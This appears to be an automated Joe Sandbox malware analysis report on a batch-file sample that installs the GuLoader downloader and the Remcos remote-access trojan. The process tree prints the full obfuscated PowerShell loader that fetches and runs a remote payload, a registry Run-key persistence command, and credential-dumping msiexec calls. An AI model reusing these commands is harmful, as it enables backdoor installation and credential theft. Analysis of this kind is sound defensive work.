Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lista produkt#U00f3w POL56583753Sarchmentdoc.bat

Overview

General Information

Sample name:Lista produkt#U00f3w POL56583753Sarchmentdoc.bat
renamed because original name is a hash value
Original sample name:Lista produktw POL56583753Sarchmentdoc.bat
Analysis ID:1543699
MD5:5f579a63bffce450528b213955a14615
SHA1:c8943b3b8055327a7b85249c9f2448b6df1967eb
SHA256:83d574c4b6620c67416e9b444fe90ea882eb86ec747641bf5113df82280525b5
Tags:batuser-AdamekZbadam
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 3248 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lista produkt#U00f3w POL56583753Sarchmentdoc.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2448 cmdline: powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Dark 'Brav$SummGSyger buluVitan Xerd danvCangoStamlK utdSip eTurinKi ts Ov,.EmblH BeceNdtvaAr,mdFlleeKultrCitrs ek [Pape$ TroS LeeiFrkhg F,bnH,gba P.ethypea Figr Rabm para njegByu,t ynkeInshr Stes Tab] Ken=Per,$m.noSMackkMe.irPh,rlNianl F.seSi ndFucae Bab ');$Spectatorial=Dark 'Rese$ArtoGAborr awcu R gnHaradt onvVr ioPro l Pu dBugbeDodgnBesesAske.Eb eDklago FonwOs enAfskludgaoThela TridForeFNonciWorklPri,eSp j(Pr i$Gai b.ubieIntrs SockNicofLucitKnuriti,dgKapieKu slmta s ProeFeebs ForiPat.nRougtVurdeFlusrOvereKad sIndtsAforeTil,nFjen,Alkv$ LamN,agea F laBuzzdDemal StveAflerEks 1 Inh7Scr )Juma ';$Naadler17=$Skilsmisser18;Nondeclaratively (Dark ' ost$StudgUdgilFjerOPadlb.luma Hi.L Tan:AngoNRompRCousLNo wsSalgtZo,eEStra=Nonf(Picct ,egePelisG nntKval-B unPKo mABlintBalaH Dis Dek$Te tN DecAMe aaPa aDA.sal.yzye.orvr,nsv1Styr7 P,n)Thir ');while (!$Nrlste) {Nondeclaratively (Dark 'Mul $AnskgGruplDjvloAtt bT ana ruslAff :NormO ycob FaljD,ffeTrowkBj.ntVilieSupetHome=Disc$ KumtTe drLideu Ande Amo ') ;Nondeclaratively $Spectatorial;Nondeclaratively (Dark 'Ani SOutktS gnaFlunRRepoTUnra-ZappsunfrLTeleeI,coeBiblpFu h Abes4Unse ');Nondeclaratively (Dark 'Indd$TgthG f slReupOGl,bbDecoA.lanLRe,u:AnhnnVarermimuL ligsRe ytunfoEFraf= K b(Ca.otStvkEneursGar.tM rm-UskrpKetuAOxyttAlgohMajo Tvr$PoweNP.daaPre aGenndHenvlNarkEPe srMorm1Udsk7Wago)Skri ') ;Nondeclaratively (Dark ' ort$StangAcqul alaOWindbRetiaMi nLRep,: ChrEIlsotIntetInstAKon,r arrRU inESti,=With$Amo GbybeLBadeoUncabByggaMar LAdum:eve,sFlleTAtr,o.inoRRagtMTorkAStopGMuleaTaylshundI F gn UntEFa tRBlges irc+ lea+Filo%inf $ ntK lvrLCordA Udmr SeallineaC ntGVvemt M.leOstes Mon.BetrcV.jfoTreduF denPrejTCirk ') ;$beskftigelsesinteressen=$Klarlagtes[$Ettarre];}$Allergists=311693;$Tugtelsen16=29701;Nondeclaratively (Dark 'Uncu$WombgTaliLMusiOAfstbOb uAInteL Bil:AnthkNeceOFiskm BamMNedkOAn ndBa oEParaR,egenP.lye FriSInse Sper=Fej TrimGCic,e OveT tig-DiplCSprjOTovaNEleptFugleDetaNstaktmars D,ct$fantnI.teACapsaMetaDKamul,ulteSamar Wit1Swim7Erin ');Nondeclaratively (Dark 'Iris$S,ndgAfdml cocoPer bci naFoldl Inf:ShufK BezuAffasOp kkFrice VotsPostl C.iaKustgInv s r=Meso Syne[Vi oS ney,ellsBadet MiceAf.imJamb.MoraC DisoLgedn scuvTromeA lerSulftUn a]Cu i:Kain:FlavFBryorMnstoagnumInkaBProtaTransHamseSlag6 Spa4 PseS T.etGener UniiLandn R ggLinj( cle$Ba cK ordoJubimTri mTrufoAabndNedbeSaltrSinanMarkeStils ar).yto ');Nondeclaratively (Dark 'vesi$GsteGblealRadio Pe.B Ka,AIndblInf,:TusiAListg Mu,ESpumrEurojUnscO emir UnrDwanneBotaN Rev Dead=Hare ri [ askS MenYkodfsConct PoteO.acMZorn. Reft KomEBo.gXFo etRefr.MassE ButNTidscD scoPrecd H.siP,rsNMallg,odh]Bet.: S,b:PrevA ntis PunCAfsviForfI Var.KamnGHalvEarchT algSrednt Tr RSamnIF shNMoungM,cr(Kamp$FedtkStakuBrussMoniKTe pENonasDithLP piAHypeG Bel)Afho ');Nondeclaratively (Dark ' Udp$T nngA knLav so ,udBTan aRa gLSuff: FeatpseueEthyu ArbTTr toPlatN Auti Buez adlE Sko=yder$Sun a elGOp fe VejR NapJ KonOCobur PyrdMa tePop N ,eo.Co,nsSullu acBM,kss T gt ayoRAmmiI erNMissGSove(resk$ThirA SabL PaelSkobeBrnerR stG onsiReams ThetFlaksSpid,Jamb$Fag tP esU VenG FulTOmprE ProLS uiSSkanE HonNGeni1 Ans6Pava)Cab, ');Nondeclaratively $Teutonize;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3796 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Dark 'Brav$SummGSyger buluVitan Xerd danvCangoStamlK utdSip eTurinKi ts Ov,.EmblH BeceNdtvaAr,mdFlleeKultrCitrs ek [Pape$ TroS LeeiFrkhg F,bnH,gba P.ethypea Figr Rabm para njegByu,t ynkeInshr Stes Tab] Ken=Per,$m.noSMackkMe.irPh,rlNianl F.seSi ndFucae Bab ');$Spectatorial=Dark 'Rese$ArtoGAborr awcu R gnHaradt onvVr ioPro l Pu dBugbeDodgnBesesAske.Eb eDklago FonwOs enAfskludgaoThela TridForeFNonciWorklPri,eSp j(Pr i$Gai b.ubieIntrs SockNicofLucitKnuriti,dgKapieKu slmta s ProeFeebs ForiPat.nRougtVurdeFlusrOvereKad sIndtsAforeTil,nFjen,Alkv$ LamN,agea F laBuzzdDemal StveAflerEks 1 Inh7Scr )Juma ';$Naadler17=$Skilsmisser18;Nondeclaratively (Dark ' ost$StudgUdgilFjerOPadlb.luma Hi.L Tan:AngoNRompRCousLNo wsSalgtZo,eEStra=Nonf(Picct ,egePelisG nntKval-B unPKo mABlintBalaH Dis Dek$Te tN DecAMe aaPa aDA.sal.yzye.orvr,nsv1Styr7 P,n)Thir ');while (!$Nrlste) {Nondeclaratively (Dark 'Mul $AnskgGruplDjvloAtt bT ana ruslAff :NormO ycob FaljD,ffeTrowkBj.ntVilieSupetHome=Disc$ KumtTe drLideu Ande Amo ') ;Nondeclaratively $Spectatorial;Nondeclaratively (Dark 'Ani SOutktS gnaFlunRRepoTUnra-ZappsunfrLTeleeI,coeBiblpFu h Abes4Unse ');Nondeclaratively (Dark 'Indd$TgthG f slReupOGl,bbDecoA.lanLRe,u:AnhnnVarermimuL ligsRe ytunfoEFraf= K b(Ca.otStvkEneursGar.tM rm-UskrpKetuAOxyttAlgohMajo Tvr$PoweNP.daaPre aGenndHenvlNarkEPe srMorm1Udsk7Wago)Skri ') ;Nondeclaratively (Dark ' ort$StangAcqul alaOWindbRetiaMi nLRep,: ChrEIlsotIntetInstAKon,r arrRU inESti,=With$Amo GbybeLBadeoUncabByggaMar LAdum:eve,sFlleTAtr,o.inoRRagtMTorkAStopGMuleaTaylshundI F gn UntEFa tRBlges irc+ lea+Filo%inf $ ntK lvrLCordA Udmr SeallineaC ntGVvemt M.leOstes Mon.BetrcV.jfoTreduF denPrejTCirk ') ;$beskftigelsesinteressen=$Klarlagtes[$Ettarre];}$Allergists=311693;$Tugtelsen16=29701;Nondeclaratively (Dark 'Uncu$WombgTaliLMusiOAfstbOb uAInteL Bil:AnthkNeceOFiskm BamMNedkOAn ndBa oEParaR,egenP.lye FriSInse Sper=Fej TrimGCic,e OveT tig-DiplCSprjOTovaNEleptFugleDetaNstaktmars D,ct$fantnI.teACapsaMetaDKamul,ulteSamar Wit1Swim7Erin ');Nondeclaratively (Dark 'Iris$S,ndgAfdml cocoPer bci naFoldl Inf:ShufK BezuAffasOp kkFrice VotsPostl C.iaKustgInv s r=Meso Syne[Vi oS ney,ellsBadet MiceAf.imJamb.MoraC DisoLgedn scuvTromeA lerSulftUn a]Cu i:Kain:FlavFBryorMnstoagnumInkaBProtaTransHamseSlag6 Spa4 PseS T.etGener UniiLandn R ggLinj( cle$Ba cK ordoJubimTri mTrufoAabndNedbeSaltrSinanMarkeStils ar).yto ');Nondeclaratively (Dark 'vesi$GsteGblealRadio Pe.B Ka,AIndblInf,:TusiAListg Mu,ESpumrEurojUnscO emir UnrDwanneBotaN Rev Dead=Hare ri [ askS MenYkodfsConct PoteO.acMZorn. Reft KomEBo.gXFo etRefr.MassE ButNTidscD scoPrecd H.siP,rsNMallg,odh]Bet.: S,b:PrevA ntis PunCAfsviForfI Var.KamnGHalvEarchT algSrednt Tr RSamnIF shNMoungM,cr(Kamp$FedtkStakuBrussMoniKTe pENonasDithLP piAHypeG Bel)Afho ');Nondeclaratively (Dark ' Udp$T nngA knLav so ,udBTan aRa gLSuff: FeatpseueEthyu ArbTTr toPlatN Auti Buez adlE Sko=yder$Sun a elGOp fe VejR NapJ KonOCobur PyrdMa tePop N ,eo.Co,nsSullu acBM,kss T gt ayoRAmmiI erNMissGSove(resk$ThirA SabL PaelSkobeBrnerR stG onsiReams ThetFlaksSpid,Jamb$Fag tP esU VenG FulTOmprE ProLS uiSSkanE HonNGeni1 Ans6Pava)Cab, ');Nondeclaratively $Teutonize;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1948 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 1280 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 1224 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 6408 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5692 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7068 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2032 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5936 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6840 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.2444032858.0000000008C20000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_2448.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_3796.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc40b:$b2: ::FromBase64String(
                • 0xb48c:$s1: -join
                • 0xec4a:$s3: Reverse
                • 0x4c38:$s4: +=
                • 0x4cfa:$s4: +=
                • 0x8f21:$s4: +=
                • 0xb03e:$s4: +=
                • 0xb328:$s4: +=
                • 0xb46e:$s4: +=
                • 0x151c3:$s4: +=
                • 0x15243:$s4: +=
                • 0x15309:$s4: +=
                • 0x15389:$s4: +=
                • 0x1555f:$s4: +=
                • 0x155e3:$s4: +=
                • 0xbcb2:$e4: Get-WmiObject
                • 0xbea1:$e4: Get-Process
                • 0xbef9:$e4: Start-Process
                • 0x15e9b:$e4: Get-Process

                System Summary

                barindex
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1224, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Udstiller35
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1280, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)", ProcessId: 1224, ProcessName: reg.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 37.230.62.86, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1948, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 52002
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1948, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)", ProcessId: 1280, ProcessName: cmd.exe
